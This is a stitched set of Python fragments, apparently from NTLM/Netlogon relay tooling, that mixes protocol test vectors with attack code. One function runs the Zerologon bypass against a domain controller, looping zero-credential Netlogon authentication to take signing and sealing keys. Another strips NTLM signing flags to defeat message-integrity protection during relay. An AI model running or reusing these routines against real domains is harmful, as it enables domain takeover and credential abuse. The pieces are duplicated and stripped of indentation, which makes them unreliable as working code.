hexdump(ntResponse)
print "\n"
print "4.2.2.2.2 LMv1 Response"
hexdump(lmResponse)
print "\n"
print "4.2.2.2.2 LMv1 Response with NTLMSSP_NEGOTIATE_LM_KEY set"
flags2 = flags
#flags2 = flags | ntlm.NTLMSSP_LM_KEY
#hexdump(struct.pack('<L',flags2))
ntResponse, lmResponse, sessionBaseKey = ntlm.computeResponseNTLMv1(long(flags2), serverChallenge, clientChallenge, serverName, domain, user, password, '', '')
hexdump(lmResponse)
print "\n"
print "4.2.2.2.3 Encrypted Session Key "
ntResponse, lmResponse, sessionBaseKey = ntlm.computeResponseNTLMv1(long(flags), serverChallenge, clientChallenge, serverName, domain, user, password, '', '')
keyExchangeKey = ntlm.KXKEY(flags, sessionBaseKey, lmResponse, serverChallenge, password,'','')
encryptedSessionKey = ntlm.generateEncryptedSessionKey(keyExchangeKey,randomSessionKey)
hexdump(encryptedSessionKey)
print "\n"
print "4.2.2.2.3 Encrypted Session Key (NTLMSSP_NON_NT_KEY)"
flags2 = flags | ntlm.NTLMSSP_NOT_NT_KEY
#hexdump(struct.pack('<L',flags2))
keyExchangeKey = ntlm.KXKEY(flags2, sessionBaseKey, lmResponse, serverChallenge, password,'','')
encryptedSessionKey = ntlm.generateEncryptedSessionKey(keyExchangeKey,randomSessionKey)
hexdump(encryptedSessionKey)
print "\n"
print "4.2.2.2.3 Encrypted Session Key (NTLMSSP_LM_KEY)"
flags2 = flags | ntlm.NTLMSSP_LM_KEY
#hexdump(struct.pack('<L',flags2))
keyExchangeKey = ntlm.KXKEY(flags2, sessionBaseKey, lmResponse, serverChallenge, password,'','')
encryptedSessionKey = ntlm.generateEncryptedSessionKey(keyExchangeKey,randomSessionKey)
hexdump(encryptedSessionKey)
def netlogonSessionKey(self, challenge, authenticateMessageBlob):
# Here we will use netlogon to get the signing session key
LOG.info("Connecting to %s NETLOGON service" % self.target.netloc)
respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(respToken2['ResponseToken'])
domainName = authenticateMessage['domain_name'].decode('utf-16le')
flags = authenticateMessage['flags']
try:
av_pairs = authenticateMessage['ntlm'][44:]
av_pairs = AV_PAIRS(av_pairs)
serverName = av_pairs[NTLMSSP_AV_HOSTNAME][1].decode('utf-16le')
except:
LOG.debug("Exception:", exc_info=True)
# We're in NTLMv1, not supported
return STATUS_ACCESS_DENIED
binding = epm.hept_map(self.target.netloc,
nrpc.MSRPC_UUID_NRPC,
protocol='ncacn_ip_tcp')
dce = transport.DCERPCTransportFactory(binding).get_dce_rpc()
dce.connect()
dce.bind(nrpc.MSRPC_UUID_NRPC)
MAX_ATTEMPTS = 6000
for attempt in range(0, MAX_ATTEMPTS):
resp = nrpc.hNetrServerReqChallenge(dce, NULL, serverName + '\x00',
b'\x00' * 8)
serverChallenge = resp['ServerChallenge']
ppp = b'\x00' * 8
try:
nrpc.hNetrServerAuthenticate3(
dce, NULL, serverName + '$\x00',
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
serverName + '\x00', ppp, 0x212effef)
except nrpc.DCERPCSessionError as ex:
# Failure should be due to a STATUS_ACCESS_DENIED error. Otherwise, the attack is probably not working.
if ex.get_error_code() == 0xc0000022:
continue
else:
LOG.error('Unexpected error code from DC: %d.',
ex.get_error_code())
except BaseException as ex:
LOG.error('Unexpected error: %s', str(ex))
LOG.info(
'Netlogon Auth OK, successfully bypassed autentication using Zerologon after %d attempts!',
attempt)
break
else:
LOG.error(
'No success bypassing auth after 6000 attempts. Target likely patched!'
)
return
clientStoredCredential = pack('<Q', unpack('<Q', ppp)[0] + 10)
# Now let's try to verify the security blob against the PDC
lflags = unpack('<L', b'\xe0\x2a\x00\x00')[0]
request = nrpc.NetrLogonSamLogonWithFlags()
request['LogonServer'] = '\x00'
request['ComputerName'] = serverName + '\x00'
request[
'ValidationLevel'] = nrpc.NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo4
request[
'LogonLevel'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation'][
'tag'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation']['LogonNetworkTransitive']['Identity'][
'LogonDomainName'] = domainName
request['LogonInformation']['LogonNetworkTransitive']['Identity'][
'ParameterControl'] = lflags
request['LogonInformation']['LogonNetworkTransitive']['Identity'][
'UserName'] = authenticateMessage['user_name'].decode('utf-16le')
request['LogonInformation']['LogonNetworkTransitive']['Identity'][
'Workstation'] = ''
request['LogonInformation']['LogonNetworkTransitive'][
'LmChallenge'] = challenge
request['LogonInformation']['LogonNetworkTransitive'][
'NtChallengeResponse'] = authenticateMessage['ntlm']
request['LogonInformation']['LogonNetworkTransitive'][
'LmChallengeResponse'] = authenticateMessage['lanman']
authenticator = nrpc.NETLOGON_AUTHENTICATOR()
authenticator[
'Credential'] = b'\x00' * 8 #nrpc.ComputeNetlogonCredential(clientStoredCredential, sessionKey)
authenticator['Timestamp'] = 0
request['Authenticator'] = authenticator
request['ReturnAuthenticator']['Credential'] = b'\x00' * 8
request['ReturnAuthenticator']['Timestamp'] = 0
request['ExtraFlags'] = 0
#request.dump()
try:
resp = dce.request(request)
#resp.dump()
except DCERPCException as e:
LOG.debug('Exception:', exc_info=True)
LOG.error(str(e))
return e.get_error_code()
LOG.info(
"%s\\%s successfully validated through NETLOGON" %
(domainName, authenticateMessage['user_name'].decode('utf-16le')))
encryptedSessionKey = authenticateMessage['session_key']
if encryptedSessionKey != '':
signingKey = generateEncryptedSessionKey(
resp['ValidationInformation']['ValidationSam4']
['UserSessionKey'], encryptedSessionKey)
else:
signingKey = resp['ValidationInformation']['ValidationSam4'][
'UserSessionKey']
LOG.info("NTLM Sign/seal key: %s " %
hexlify(signingKey).decode('utf-8'))
if flags & ntlm.NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY:
self.session._DCERPC_v5__clientSigningKey = ntlm.SIGNKEY(
flags, signingKey)
self.session._DCERPC_v5__serverSigningKey = ntlm.SIGNKEY(
flags, signingKey, b"Server")
self.session._DCERPC_v5__clientSealingKey = ntlm.SEALKEY(
flags, signingKey)
self.session._DCERPC_v5__serverSealingKey = ntlm.SEALKEY(
flags, signingKey, b"Server")
# Preparing the keys handle states
cipher3 = ARC4.new(self.session._DCERPC_v5__clientSealingKey)
self.session._DCERPC_v5__clientSealingHandle = cipher3.encrypt
cipher4 = ARC4.new(self.session._DCERPC_v5__serverSealingKey)
self.session._DCERPC_v5__serverSealingHandle = cipher4.encrypt
else:
# Same key for everything
self.session._DCERPC_v5__clientSigningKey = signingKey
self.session._DCERPC_v5__serverSigningKey = signingKey
self.session._DCERPC_v5__clientSealingKey = signingKey
self.session._DCERPC_v5__serverSealingKey = signingKey
cipher = ARC4.new(self.session._DCERPC_v5__clientSigningKey)
self.session._DCERPC_v5__clientSealingHandle = cipher.encrypt
self.session._DCERPC_v5__serverSealingHandle = cipher.encrypt
self.session._DCERPC_v5__sequence = 0
self.session._DCERPC_v5__flags = flags
return signingKey
def test_ntlmv2(self):
print("####### 4.2.4 NTLMv2 Authentication")
ntlm.USE_NTLMv2 = True
serverName = b(
'\x02\x00\x0c\x00\x44\x00\x6f\x00\x6d\x00\x61\x00\x69\x00\x6e\x00\x01\x00\x0c\x00\x53\x00\x65\x00\x72\x00\x76\x00\x65\x00\x72\x00\x00\x00\x00\x00'
)
# Still the aTime won't be set to zero. that must be changed in ntlm.computeResponseNTLM2. Gotta make this more automated
flags = ntlm.NTLMSSP_NEGOTIATE_KEY_EXCH | ntlm.NTLMSSP_NEGOTIATE_56 | ntlm.NTLMSSP_NEGOTIATE_128 | \
ntlm.NTLMSSP_NEGOTIATE_VERSION | ntlm.NTLMSSP_NEGOTIATE_TARGET_INFO | \
ntlm.NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY | ntlm.NTLMSSP_TARGET_TYPE_SERVER | \
ntlm.NTLMSSP_NEGOTIATE_ALWAYS_SIGN | ntlm.NTLMSSP_NEGOTIATE_NTLM | ntlm.NTLMSSP_NEGOTIATE_SEAL | \
ntlm.NTLMSSP_NEGOTIATE_SIGN | ntlm.NTLM_NEGOTIATE_OEM | ntlm.NTLMSSP_NEGOTIATE_UNICODE
print("Flags")
hexdump(struct.pack('<L', flags))
print("\n")
print("4.2.4.1.1 NTOWFv2 and LMOWFv2")
res = ntlm.NTOWFv2(self.user, self.password, self.domain)
hexdump(res)
self.assertTrue(res == bytearray(
b'\x0c\x86\x8a@;\xfdz\x93\xa3\x00\x1e\xf2.\xf0.?'))
print("\n")
print("\n")
print("4.2.4.1.2 Session Base Key")
ntResponse, lmResponse, sessionBaseKey = ntlm.computeResponseNTLMv2(
flags, self.serverChallenge, self.clientChallenge, serverName,
self.domain, self.user, self.password, '', '')
hexdump(sessionBaseKey)
self.assertTrue(sessionBaseKey == bytearray(
b'\x8d\xe4\x0c\xca\xdb\xc1\x4a\x82\xf1\x5c\xb0\xad\x0d\xe9\x5c\xa3'
))
print("\n")
print("4.2.4.2.1 LMv2 Response")
hexdump(lmResponse)
self.assertTrue(lmResponse == bytearray(
b'\x86\xc3P\x97\xac\x9c\xec\x10%TvJW\xcc\xcc\x19\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa'
))
print("\n")
print("4.2.4.2.2 NTLMv2 Response")
hexdump(ntResponse[:16])
self.assertTrue(ntResponse[:16] == bytearray(
b'\x68\xcd\x0a\xb8\x51\xe5\x1c\x96\xaa\xbc\x92\x7b\xeb\xef\x6a\x1c'
))
print("\n")
print("4.2.4.2.3 Encrypted Session Key")
keyExchangeKey = ntlm.KXKEY(flags, sessionBaseKey, lmResponse,
self.serverChallenge, self.password, '',
'')
encryptedSessionKey = ntlm.generateEncryptedSessionKey(
keyExchangeKey, self.randomSessionKey)
hexdump(encryptedSessionKey)
self.assertTrue(encryptedSessionKey == bytearray(
b'\xC5\xDA\xD2\x54\x4F\xC9\x79\x90\x94\xCE\x1C\xE9\x0B\xC9\xD0\x3E'
))
print("\n")
print("AUTHENTICATE MESSAGE")
encryptedSessionKey = ntlm.generateEncryptedSessionKey(
keyExchangeKey, self.randomSessionKey)
ntlmChallengeResponse = ntlm.NTLMAuthChallengeResponse(
self.user, self.password, self.serverChallenge)
ntlmChallengeResponse['flags'] = flags
ntlmChallengeResponse['host_name'] = self.workstationName.encode(
'utf-16le')
ntlmChallengeResponse['domain_name'] = self.domain.encode('utf-16le')
ntlmChallengeResponse['lanman'] = lmResponse
ntlmChallengeResponse['ntlm'] = ntResponse
ntlmChallengeResponse['session_key'] = encryptedSessionKey
hexdump(ntlmChallengeResponse.getData())
self.assertTrue(ntlmChallengeResponse.getData() == bytearray(
b'NTLMSSP\x00\x03\x00\x00\x00\x18\x00\x18\x00|\x00\x00\x00T\x00T\x00\x94\x00\x00\x00\x0c\x00\x0c\x00X\x00\x00\x00\x08\x00\x08\x00d\x00\x00\x00\x10\x00\x10\x00l\x00\x00\x00\x10\x00\x10\x00\xe8\x00\x00\x003\x82\x8a\xe2D\x00o\x00m\x00a\x00i\x00n\x00U\x00s\x00e\x00r\x00C\x00O\x00M\x00P\x00U\x00T\x00E\x00R\x00\x86\xc3P\x97\xac\x9c\xec\x10%TvJW\xcc\xcc\x19\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaah\xcd\n\xb8Q\xe5\x1c\x96\xaa\xbc\x92{\xeb\xefj\x1c\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\x00\x00\x00\x00\x02\x00\x0c\x00D\x00o\x00m\x00a\x00i\x00n\x00\x01\x00\x0c\x00S\x00e\x00r\x00v\x00e\x00r\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc5\xda\xd2TO\xc9y\x90\x94\xce\x1c\xe9\x0b\xc9\xd0>'
))
print("\n")
print("4.2.4.4 GSS_WrapEx")
print("Plaintext")
hexdump(self.plaintext)
print("\n")
print("Output of SEAL()")
exportedSessionKey = self.randomSessionKey
clientSigningKey = ntlm.SIGNKEY(flags, exportedSessionKey)
clientSealingKey = ntlm.SEALKEY(flags, exportedSessionKey)
from Cryptodome.Cipher import ARC4
cipher2 = ARC4.new(clientSealingKey)
client_sealing_h = cipher2.encrypt
print("SEALKEY()")
hexdump(clientSealingKey)
self.assertTrue(clientSealingKey == bytearray(
b'Y\xf6\x00\x97<\xc4\x96\n%H\n|\x19nLX'))
print("\n")
print("SIGNKEY()")
hexdump(clientSigningKey)
self.assertTrue(clientSigningKey == bytearray(
b'G\x88\xdc\x86\x1bG\x82\xf3]C\xfd\x98\xfe\x1a-9'))
print("\n")
print("Sealed Data")
sealedMsg, signature = ntlm.SEAL(flags, clientSealingKey,
clientSigningKey, self.plaintext,
self.plaintext, self.seqNum,
client_sealing_h)
#signature = ntlm.SIGN(flags, clientSigningKey, plaintext, seqNum, client_sealing_h)
hexdump(sealedMsg)
self.assertTrue(sealedMsg == bytearray(
b'T\xe5\x01e\xbf\x196\xdc\x99` \xc1\x81\x1b\x0f\x06\xfb_'))
print("\n")
print("Signature")
hexdump(signature.getData())
self.assertTrue(signature.getData() == bytearray(
b'\x01\x00\x00\x00\x00\xc1a\xa1\x1e@\x03\x9f\x00\x00\x00\x00'))
#print (repr(bytearray(str(signature))))
#raise
print("\n")
def test_ntlmv1(self):
print("####### 4.2.2 NTLMv1 Authentication")
ntlm.USE_NTLMv2 = False
print("4.2.2.1 LMOWFv1()")
res = ntlm.LMOWFv1(self.password)
hexdump(res)
self.assertTrue(
res == bytearray(b'\xe5,\xacgA\x9a\x9a"J;\x10\x8f?\xa6\xcbm'))
print("\n")
print("4.2.2.1.2 NTOWFv1()")
res = ntlm.NTOWFv1(self.password)
hexdump(res)
self.assertTrue(res == bytearray(
b'\xa4\xf4\x9c\x40\x65\x10\xbd\xca\xb6\x82\x4e\xe7\xc3\x0f\xd8\x52'
))
print("\n")
print("4.2.2.1.3 Session Base Key and Key Exchange Key")
ntResponse, lmResponse, sessionBaseKey = ntlm.computeResponseNTLMv1(
int(self.flags), self.serverChallenge, self.clientChallenge,
self.serverName, self.domain, self.user, self.password, '', '')
hexdump(sessionBaseKey)
self.assertTrue(sessionBaseKey == bytearray(
b'\xD8\x72\x62\xB0\xCD\xE4\xB1\xCB\x74\x99\xBE\xCC\xCD\xF1\x07\x84'
))
print("\n")
print("4.2.2.2.1 NTLMv1 Response")
hexdump(ntResponse)
self.assertTrue(ntResponse == bytearray(
b'\x67\xC4\x30\x11\xF3\x02\x98\xA2\xAD\x35\xEC\xE6\x4F\x16\x33\x1C\x44\xBD\xBE\xD9\x27\x84\x1F\x94'
))
print("\n")
print("4.2.2.2.2 LMv1 Response")
hexdump(lmResponse)
self.assertTrue(lmResponse == bytearray(
b'\x98\xDE\xF7\xB8\x7F\x88\xAA\x5D\xAF\xE2\xDF\x77\x96\x88\xA1\x72\xde\xf1\x1c\x7d\x5c\xcd\xef\x13'
))
print("\n")
print("4.2.2.2.2 LMv1 Response with NTLMSSP_NEGOTIATE_LM_KEY set")
flags2 = self.flags
#flags2 = flags | ntlm.NTLMSSP_LM_KEY
#hexdump(struct.pack('<L',flags2))
ntResponse, lmResponse, sessionBaseKey = ntlm.computeResponseNTLMv1(
int(flags2), self.serverChallenge, self.clientChallenge,
self.serverName, self.domain, self.user, self.password, '', '')
hexdump(lmResponse)
print("\n")
print("4.2.2.2.3 Encrypted Session Key ")
ntResponse, lmResponse, sessionBaseKey = ntlm.computeResponseNTLMv1(
int(self.flags), self.serverChallenge, self.clientChallenge,
self.serverName, self.domain, self.user, self.password, '', '')
keyExchangeKey = ntlm.KXKEY(self.flags, sessionBaseKey, lmResponse,
self.serverChallenge, self.password, '',
'')
encryptedSessionKey = ntlm.generateEncryptedSessionKey(
keyExchangeKey, self.randomSessionKey)
hexdump(encryptedSessionKey)
self.assertTrue(encryptedSessionKey == bytearray(
b'\x51\x88\x22\xB1\xB3\xF3\x50\xC8\x95\x86\x82\xEC\xBB\x3E\x3C\xB7'
))
print("\n")
print("4.2.2.2.3 Encrypted Session Key (NTLMSSP_NON_NT_KEY)")
flags2 = self.flags | ntlm.NTLMSSP_REQUEST_NON_NT_SESSION_KEY
keyExchangeKey = ntlm.KXKEY(flags2, sessionBaseKey, lmResponse,
self.serverChallenge, self.password, '',
'')
encryptedSessionKey = ntlm.generateEncryptedSessionKey(
keyExchangeKey, self.randomSessionKey)
hexdump(encryptedSessionKey)
#ToDo Fix this
#self.assertTrue(encryptedSessionKey==bytearray(b'\x74\x52\xca\x55\xc2\x25\xa1\xca\x04\xb4\x8f\xae\x32\xcf\x56\xfc'))
print("\n")
print("4.2.2.2.3 Encrypted Session Key (NTLMSSP_LM_KEY)")
flags2 = self.flags | ntlm.NTLMSSP_NEGOTIATE_LM_KEY
#hexdump(struct.pack('<L',flags2))
keyExchangeKey = ntlm.KXKEY(flags2, sessionBaseKey, lmResponse,
self.serverChallenge, self.password, '',
'')
encryptedSessionKey = ntlm.generateEncryptedSessionKey(
keyExchangeKey, self.randomSessionKey)
hexdump(encryptedSessionKey)
#ToDo Fix this
#self.assertTrue(encryptedSessionKey==bytearray(b'\x4c\xd7\xbb\x57\xd6\x97\xef\x9b\x54\x9f\x02\xb8\xf9\xb3\x78\x64')
print("\n")
print("4.2.2.3 AUTHENTICATE MESSAGE")
ntResponse, lmResponse, sessionBaseKey = ntlm.computeResponseNTLMv1(
int(self.flags), self.serverChallenge, self.clientChallenge,
self.serverName, self.domain, self.user, self.password, '', '')
keyExchangeKey = ntlm.KXKEY(self.flags, sessionBaseKey, lmResponse,
self.serverChallenge, self.password, '',
'')
encryptedSessionKey = ntlm.generateEncryptedSessionKey(
keyExchangeKey, self.randomSessionKey)
ntlmChallengeResponse = ntlm.NTLMAuthChallengeResponse(
self.user, self.password, self.serverChallenge)
ntlmChallengeResponse['flags'] = flags2
ntlmChallengeResponse['host_name'] = self.workstationName.encode(
'utf-16le')
ntlmChallengeResponse['domain_name'] = self.domain.encode('utf-16le')
ntlmChallengeResponse['lanman'] = lmResponse
ntlmChallengeResponse['ntlm'] = ntResponse
ntlmChallengeResponse['session_key'] = encryptedSessionKey
hexdump(ntlmChallengeResponse.getData())
self.assertTrue(ntlmChallengeResponse.getData() == bytearray(
b'NTLMSSP\x00\x03\x00\x00\x00\x18\x00\x18\x00|\x00\x00\x00\x18\x00\x18\x00\x94\x00\x00\x00\x0c\x00\x0c\x00X\x00\x00\x00\x08\x00\x08\x00d\x00\x00\x00\x10\x00\x10\x00l\x00\x00\x00\x10\x00\x10\x00\xac\x00\x00\x00\xb3\x82\x02\xe2D\x00o\x00m\x00a\x00i\x00n\x00U\x00s\x00e\x00r\x00C\x00O\x00M\x00P\x00U\x00T\x00E\x00R\x00\x98\xde\xf7\xb8\x7f\x88\xaa]\xaf\xe2\xdfw\x96\x88\xa1r\xde\xf1\x1c}\\\xcd\xef\x13g\xc40\x11\xf3\x02\x98\xa2\xad5\xec\xe6O\x163\x1cD\xbd\xbe\xd9\'\x84\x1f\x94Q\x88"\xb1\xb3\xf3P\xc8\x95\x86\x82\xec\xbb><\xb7'
))
print("\n")
print("4.2.2.4 GSS_WrapEx")
print("Output of SEAL()")
from Cryptodome.Cipher import ARC4
cipher = ARC4.new(self.randomSessionKey)
handle = cipher.encrypt
print("Plaintext")
hexdump(self.plaintext)
print("\n")
sealedMsg, signature = ntlm.SEAL(self.flags, self.nonce, self.nonce,
self.plaintext, self.plaintext,
self.seqNum, handle)
#signature = ntlm.SIGN(flags, nonce, plaintext, seqNum, handle)
hexdump(sealedMsg)
self.assertTrue(sealedMsg == bytearray(
b'V\xfe\x04\xd8a\xf91\x9a\xf0\xd7#\x8a.;ME\x7f\xb8'))
print("\n")
hexdump(signature.getData())
self.assertTrue(signature.getData() == bytearray(
b'\x01\x00\x00\x00\x00\x00\x00\x00\t\xdc\xd1\xdf.E\x9d6'))
print("\n")
print("####### 4.2.3 NTLMv1 with Client Challenge")
flags = ntlm.NTLMSSP_NEGOTIATE_56 | ntlm.NTLMSSP_NEGOTIATE_VERSION | ntlm.NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY \
| ntlm.NTLMSSP_TARGET_TYPE_SERVER | ntlm.NTLMSSP_NEGOTIATE_ALWAYS_SIGN | ntlm.NTLMSSP_NEGOTIATE_NTLM |\
ntlm.NTLMSSP_NEGOTIATE_SEAL | ntlm.NTLMSSP_NEGOTIATE_SIGN | ntlm.NTLM_NEGOTIATE_OEM | ntlm.NTLMSSP_NEGOTIATE_UNICODE
print("Flags")
hexdump(struct.pack('<L', flags))
print("\n")
print("4.2.3.1.1 NTOWFv1(password)")
hexdump(ntlm.NTOWFv1(self.password))
print("\n")
print("4.2.3.1.2 Session Base Key")
ntResponse, lmResponse, sessionBaseKey = ntlm.computeResponseNTLMv1(
int(flags), self.serverChallenge, self.clientChallenge,
self.serverName, self.domain, self.user, self.password, '', '')
hexdump(sessionBaseKey)
self.assertTrue(sessionBaseKey == bytearray(
b'\xd8rb\xb0\xcd\xe4\xb1\xcbt\x99\xbe\xcc\xcd\xf1\x07\x84'))
print("\n")
print("4.2.3.1.3 Key Exchange Key")
keyExchangeKey = ntlm.KXKEY(flags, sessionBaseKey, lmResponse,
self.serverChallenge, self.password, '',
'')
hexdump(keyExchangeKey)
# ToDo: Fix this
#self.assertTrue(keyExchangeKey==bytearray(b'\xeb\x93\x42\x9a\x8b\xd9\x52\xf8\xb8\x9c\x55\xb8\x7f\x47\x5e\xdc'))
print("\n")
print("4.2.3.2.1 LMv1 Response")
hexdump(lmResponse)
#self.assertTrue(lmResponse==bytearray(b'\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'))
print("\n")
print("4.2.3.2.2 NTLMv1 Response")
hexdump(ntResponse)
# ToDo: Fix this
#self.assertTrue(ntResponse==bytearray(b'\x75\x37\xf8\x03\xae\x36\x71\x28\xca\x45\x82\x04\xbd\xe7\xca\xf8\x1e\x97\xed\x26\x83\x26\x72\x32'))
print("\n")
print("AUTHENTICATE MESSAGE")
ntlm.generateEncryptedSessionKey(keyExchangeKey, self.randomSessionKey)
ntlmChallengeResponse = ntlm.NTLMAuthChallengeResponse(
self.user, self.password, self.serverChallenge)
ntlmChallengeResponse['flags'] = flags2
ntlmChallengeResponse['host_name'] = self.workstationName.encode(
'utf-16le')
ntlmChallengeResponse['domain_name'] = self.domain.encode('utf-16le')
ntlmChallengeResponse['lanman'] = lmResponse
ntlmChallengeResponse['ntlm'] = ntResponse
hexdump(ntlmChallengeResponse.getData())
self.assertTrue(ntlmChallengeResponse.getData() == bytearray(
b'NTLMSSP\x00\x03\x00\x00\x00\x18\x00\x18\x00|\x00\x00\x00\x18\x00\x18\x00\x94\x00\x00\x00\x0c\x00\x0c\x00X\x00\x00\x00\x08\x00\x08\x00d\x00\x00\x00\x10\x00\x10\x00l\x00\x00\x00\x00\x00\x00\x00\xac\x00\x00\x00\xb3\x82\x02\xe2D\x00o\x00m\x00a\x00i\x00n\x00U\x00s\x00e\x00r\x00C\x00O\x00M\x00P\x00U\x00T\x00E\x00R\x00\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u7\xf8\x03\xae6q(\xcaE\x82\x04\xbd\xe7\xca\xf8\x1e\x97\xed&\x83&r2'
))
print("\n")
print("4.2.3.4 GSS_WrapEx")
print("Plaintext")
hexdump(self.plaintext)
print("\n")
print("Output of SEAL()")
exportedSessionKey = keyExchangeKey
clientSigningKey = ntlm.SIGNKEY(flags, exportedSessionKey)
clientSealingKey = ntlm.SEALKEY(flags, exportedSessionKey)
from Cryptodome.Cipher import ARC4
cipher = ARC4.new(clientSigningKey)
cipher2 = ARC4.new(clientSealingKey)
client_sealing_h = cipher2.encrypt
print("SEALKEY()")
hexdump(clientSealingKey)
print("\n")
print("SIGNKEY()")
hexdump(clientSigningKey)
print("\n")
print("Sealed Data")
sealedMsg, signature = ntlm.SEAL(flags, clientSealingKey,
clientSigningKey, self.plaintext,
self.plaintext, self.seqNum,
client_sealing_h)
#signature = ntlm.SIGN(flags, clientSigningKey, plaintext, seqNum, client_sealing_h)
hexdump(sealedMsg)
# ToDo: Fix this
#self.assertTrue(ntResponse==bytearray(b'\xa0\x23\x72\xf6\x53\x02\x73\xf3\xaa\x1e\xb9\x01\x90\xce\x52\x00\xc9\x9d'))
print("\n")
print("Signature")
hexdump(signature.getData())
# ToDo: Fix this
#self.assertTrue(ntResponse==bytearray(b'\x01\x00\x00\x00\xff\x2a\xeb\x52\xf6\x81\x79\x3a\x00\x00\x00\x00')
print("\n")
def mod_getNTLMSSPType3(type1,
type2,
user,
password,
domain,
lmhash='',
nthash='',
use_ntlmv2=USE_NTLMv2):
# Safety check in case somebody sent password = None.. That's not allowed. Setting it to '' and hope for the best.
if password is None:
password = ''
# Let's do some encoding checks before moving on. Kind of dirty, but found effective when dealing with
# international characters.
import sys
encoding = sys.getfilesystemencoding()
if encoding is not None:
try:
user.encode('utf-16le')
except:
user = user.decode(encoding)
try:
password.encode('utf-16le')
except:
password = password.decode(encoding)
try:
domain.encode('utf-16le')
except:
domain = user.decode(encoding)
ntlmChallenge = ntlm.NTLMAuthChallenge(type2)
# Let's start with the original flags sent in the type1 message
responseFlags = type1['flags']
# Token received and parsed. Depending on the authentication
# method we will create a valid ChallengeResponse
ntlmChallengeResponse = ntlm.NTLMAuthChallengeResponse(
user, password, ntlmChallenge['challenge'])
clientChallenge = ntlm.b("".join([
random.choice(string.digits + string.ascii_letters) for _ in range(8)
]))
serverName = ntlmChallenge['TargetInfoFields']
ntResponse, lmResponse, sessionBaseKey = ntlm.computeResponse(
ntlmChallenge['flags'], ntlmChallenge['challenge'], clientChallenge,
serverName, domain, user, password, lmhash, nthash, use_ntlmv2)
# Let's check the return flags
if (ntlmChallenge['flags']
& ntlm.NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY) == 0:
# No extended session security, taking it out
responseFlags &= 0xffffffff ^ ntlm.NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY
if (ntlmChallenge['flags'] & ntlm.NTLMSSP_NEGOTIATE_128) == 0:
# No support for 128 key len, taking it out
responseFlags &= 0xffffffff ^ ntlm.NTLMSSP_NEGOTIATE_128
if (ntlmChallenge['flags'] & ntlm.NTLMSSP_NEGOTIATE_KEY_EXCH) == 0:
# No key exchange supported, taking it out
responseFlags &= 0xffffffff ^ ntlm.NTLMSSP_NEGOTIATE_KEY_EXCH
# drop the mic need to unset these flags
if (ntlmChallenge['flags'] & ntlm.NTLMSSP_NEGOTIATE_SEAL) != 0:
responseFlags ^= ntlm.NTLMSSP_NEGOTIATE_SEAL
if (ntlmChallenge['flags'] & ntlm.NTLMSSP_NEGOTIATE_SIGN) != 0:
responseFlags ^= ntlm.NTLMSSP_NEGOTIATE_SIGN
if (ntlmChallenge['flags'] & ntlm.NTLMSSP_NEGOTIATE_ALWAYS_SIGN) != 0:
responseFlags ^= ntlm.NTLMSSP_NEGOTIATE_ALWAYS_SIGN
keyExchangeKey = ntlm.KXKEY(ntlmChallenge['flags'], sessionBaseKey,
lmResponse, ntlmChallenge['challenge'],
password, lmhash, nthash, use_ntlmv2)
# Special case for anonymous login
if user == '' and password == '' and lmhash == '' and nthash == '':
keyExchangeKey = b'\x00' * 16
if ntlmChallenge['flags'] & ntlm.NTLMSSP_NEGOTIATE_KEY_EXCH:
exportedSessionKey = ntlm.b("".join([
random.choice(string.digits + string.ascii_letters)
for _ in range(16)
]))
encryptedRandomSessionKey = ntlm.generateEncryptedSessionKey(
keyExchangeKey, exportedSessionKey)
else:
encryptedRandomSessionKey = None
exportedSessionKey = keyExchangeKey
ntlmChallengeResponse['flags'] = responseFlags
ntlmChallengeResponse['domain_name'] = domain.encode('utf-16le')
ntlmChallengeResponse['host_name'] = type1.getWorkstation().encode(
'utf-16le')
if lmResponse == '':
ntlmChallengeResponse['lanman'] = b'\x00'
else:
ntlmChallengeResponse['lanman'] = lmResponse
ntlmChallengeResponse['ntlm'] = ntResponse
if encryptedRandomSessionKey is not None:
ntlmChallengeResponse['session_key'] = encryptedRandomSessionKey
return ntlmChallengeResponse, exportedSessionKey
def netlogonSessionKey(self, authenticateMessageBlob):
# Here we will use netlogon to get the signing session key
logging.info("Connecting to %s NETLOGON service" %
self.serverConfig.domainIp)
#respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(authenticateMessageBlob)
_, machineAccount = self.serverConfig.machineAccount.split('/')
domainName = authenticateMessage['domain_name'].decode('utf-16le')
try:
serverName = machineAccount[:len(machineAccount) - 1]
except:
# We're in NTLMv1, not supported
return STATUS_ACCESS_DENIED
stringBinding = r'ncacn_np:%s[\PIPE\netlogon]' % self.serverConfig.domainIp
rpctransport = transport.DCERPCTransportFactory(stringBinding)
if len(self.serverConfig.machineHashes) > 0:
lmhash, nthash = self.serverConfig.machineHashes.split(':')
else:
lmhash = ''
nthash = ''
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(machineAccount, '', domainName,
lmhash, nthash)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(nrpc.MSRPC_UUID_NRPC)
resp = nrpc.hNetrServerReqChallenge(dce, NULL, serverName + '\x00',
b'12345678')
